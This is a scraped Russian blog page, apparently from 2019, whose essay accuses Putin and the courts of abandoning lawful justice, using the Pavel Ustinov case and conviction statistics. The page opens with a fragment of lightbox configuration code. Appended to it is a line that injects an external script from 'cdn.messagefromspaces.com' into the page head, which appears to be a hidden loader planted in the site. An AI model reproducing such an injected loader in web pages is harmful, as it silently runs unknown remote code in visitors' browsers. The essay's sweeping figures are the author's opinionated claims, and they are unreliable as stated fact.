, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Стало ли очевидным и для Путина отсутствие правосудия в стране?

20 Сен

Более двадцати лет в своих публикациях рассказываю  о том, что в России нет правосудия, как вида государственной деятельности, осуществляемой в особом порядке, установленном Конституцией и процессуальным законодательством. Однако со стороны тех, кто взялся осуществлять государственную власть, увешанных званиями и наградами «экспертов», нет никакой реакции на мои доводы. Молчит и общественность.

И,  вдруг,  по делу  начинающего актера Павла Устинова, которому дали 3,5 года колонии, россияне осознали, что в России нет правосудия, государственной деятельности основанной на правилах, установленных Конституцией и процессуальным законодательством.

Не остались простыми наблюдателями даже священники Русской Православной церкви. Батюшки уверяют https://www.dw.com/ru/%D1%81%D0%B2%D1%8F%D1%89%D0%B5%D0%BD%D0%BD%D0%B8%D0%BA%D0%B8-%D1%80%D0%BF%D1%86-%D0%BF%D1%80%D0%B8%D0%B7%D0%B2%D0%B0%D0%BB%D0%B8-%D0%BF%D0%B5%D1%80%D0%B5%D1%81%D0%BC%D0%BE%D1%82%D1%80%D0%B5%D1%82%D1%8C-%D1%80%D0%B5%D1%88%D0%B5%D0%BD%D0%B8%D1%8F-%D0%BF%D0%BE-%D0%BC%D0%BE%D1%81%D0%BA%D0%BE%D0%B2%D1%81%D0%BA%D0%BE%D0%BC%D1%83-%D0%B4%D0%B5%D0%BB%D1%83/a-50465201  , что власти сами превращают правосудие в посмешище.

«Вопиющей несправедливостью» назвал https://www.mk.ru/politics/2019/09/18/turchak-nazval-prigovor-pavlu-ustinovu-vopiyushhey-nespravedlivostyu.html?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews  ситуацию, в которой оказался Устинов, секретарь генсовета «Единой России», член Совета Федерации Андрей Турчак.

По мнению https://ria.ru/20190919/1558847487.html?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews  директора Росгвардии Виктора Золотова, актер заслужил один год условно.

Прокуратура, осуществляющая от имени государства уголовное преследование, в течение нескольких дней высказывает противоречащие позиции по этому делу.

Изначально  прокурор, поддерживая государственной обвинение, просил для  Устинова 6 лет колонии (больше, чем в итоге назначил суд — три с половиной года), а  после его осуждения, Генпрокуратура подала ходатайство о смягчении наказания и попросила изменить приговор Устинову. Как отмечали в ведомстве, они не оспаривают доказанность вины актёра, однако считают приговор чрезмерно суровым.

В результате суд отпустил https://russian.rt.com/russia/news/670035-sud-reshenie-ustinov?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews   Павла Устинова под подписку о невыезде.

Поражает в этих событиях то, что Кремль https://tass.ru/obschestvo/6909414?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews  не удивляет, что прокуратура в течение нескольких дней высказывает противоречащие позиции по этому делу. Неужели деградирует уже и прокуратура?

Состав исполнителей судебной власти почти 20 лет формирует гарант Конституции Владимир Путин. Именно он позволяет облачаться в судейские одежды и вершить правосудие. Но его нет, поскольку нет подчинения судей Конституции России и порядку судопроизводства. Почему нет подчинения, Путин  и его «эксперты» знать не желают.

Бездействие гаранта Конституции Владимира Путина по фактам, доказывающим неисполнение его назначенцами порядка уголовного судопроизводства, привело к тому, что уголовное судопроизводство утратило свое назначение.

Проводимые исследования http://rapsinews.ru/judicial_analyst/20141202/272697983.html    доказывают, что не более 10% пострадавших от преступлений получают статус «потерпевший», но Путин  продолжает http://kremlin.ru/events/president/news/59913  себя и россиян убеждать в том, что идёт «сокращение общего количества преступлений».

А это значит, что лица, осуществляющие уголовное преследование от имени государства по уголовным делам не осуществляют защиту прав и законных интересов потерпевших от преступлений.

При этом, СМИ приводят факты, доказывающие, что в  России не изжито пыточное судопроизводство, когда назначенного обвиняемым заставляют признать вину в деяниях, которые он не совершал либо взять на себя чужую вину. Найти защиту от незаконного и необоснованного обвинения и осуждения, нигде не возможно.

Уже и сам Путин поражается https://www.kommersant.ru/doc/3916763?from=doc_vrez  тому, что около 70% подсудимых осуждают,  на одних только признательных показаниях подсудимых, не исследуя собранные по делу доказательства, но остановить этот произвол он даже не пытается.

Способствует такому судопроизводству то, что в стране никто не обеспечивает исполнение законов, направленных на защиту личности от произвола должностных лиц.

Никем не исполняется решение Конституционного Суда РФ о том, что  доводы защиты нельзя игнорировать, без их опровержения.

Судьи, игнорирующие доводы защиты о том, что имело место нарушение норм УПК РФ следователем или дознавателем, совершают не ошибки, а  осуществляют действия, направленные на вынесение заведомо неправосудных приговоров, решений или иных судебных актов.

Именно это мы видим по делу Устинова.

Судья Тверского суда Москвы Алексей Криворучко не удовлетворил ходатайство адвоката просмотреть  видео задержания обвиняемого.

А ещё ранее, другой судья, избирая Устинову  в качестве меры пресечения, содержание под стражей, не  проверил  порядок его привлечения в качестве обвиняемого.

Статья 171 УПК РФ чётко предписывает, что постановление о привлечении в качестве обвиняемого следователь может выносить только при наличии «достаточных доказательств, дающих основания для обвинения». Но эту «достаточность доказательств» судьи не проверяют ни при решении вопроса о заключении под стражу, ни при вынесении приговора, когда подсудимый согласен с предъявленным обвинением.

Так в  стране уже 15 лет неправомерно осуждают  по 500 −700 тысяч подсудимых  ежегодно.

Общественность и имеющие дипломы юристов молчат.

Такая неправомерная правоприменительная практика уже не волнует Конституционный Суд РФ, который  уже 20 лет не даёт такой практике правовой оценки в своих решениях, что ранее неоднократно делал.

Уполномоченный при президенте РФ по защите прав предпринимателей Борис Титов, убедившись в том, что Путин не реагирует на его предложения по судебной системе, намерен создать https://echo.msk.ru/blog/titov_b/2504171-echo/     «черный список» российских судей.

Предполагается, что специальная экспертная группа будет оценивать судейские решения, информируя общественность об  очевидных пробелах в правоприменительной практике, и фактически показывать пальцем на тех, кто принимает решения, не подчиняясь требованиям Конституции и порядку судопроизводства.

Готов быть экспертом такой группы.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.